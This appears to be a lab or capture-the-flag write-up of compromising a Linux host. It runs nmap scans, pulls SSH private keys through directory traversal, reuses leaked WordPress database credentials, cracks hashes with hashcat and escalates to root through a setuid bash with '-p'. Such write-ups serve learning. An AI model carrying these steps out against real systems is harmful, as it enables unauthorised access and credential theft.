Enumerating the target:
One of the most important skiil of cybersecurity analyst is to extract valuable information, but before that, we need get as much information as we possibly can
I start my enumeration from nmap 4 commands to scan target:
nmap <IP> # short, just to oriantate with what we are dealing
nmap -sC -sV <IP> # using basic scripts and enumerate the version of used software
nmap -sC -sV -p- -A -oA nmap_tcp <IP> # the longest scan to probe all ports
nmap -sU <IP> # in case there are some open SMTP servicenmap -sC -sV 192.168.175.89 let’s see what we have there:
Also, don’t forget, that there are other types of keys like:
- id_ed25519
- id_dsa
- id_ecdsa
it is good to know for exploitation of “Directory traversal vulnerability”
It looks like some base64 encoding, lets decode it:
We got id_rsa key from decoding, so it is time to find some valid username to try to login. Let’s go to the web!
also we found one more username:
After trying this first noticed usernames, we got initial foothold on the server:
after that I really like to check some things myself (where our user has permission to run command on behalf of super user):
and after it run linpeas.sh, which is incredible fast and useful
the most interesting findings:
The first thing, that I did after that was to trz to login with disclose credentials, but it failed:
After that, I have tried to authenticate myself remotely to the potential mysql server on port 33060, but It also failed:
After that, I checked, if we have “mysql” ELF binary on machine, and successfuly authenticated myself into the databse with leaked credentials on “wp_config” screenshot:
After that, I found table of users, where admin’s hash of password has been disclosed:
After, I identified type of hash and make assumption, that this is “wordpress” hash:
I run hascat on it with rockyou wordlist, but unfortunately it failed, because hashcat was exhausted:
UPDATE:
hey! Occasionally, /bin/bash has special option: -p, that force /bin/bash to keep effective UID it is launched with, in our case effective UID is root. -> it allows setuid bit to be effective in allowing bash to keep the user it is setuid to
so we just run:
/bin/bash -p and gain privilege access:
Thank you for your time!
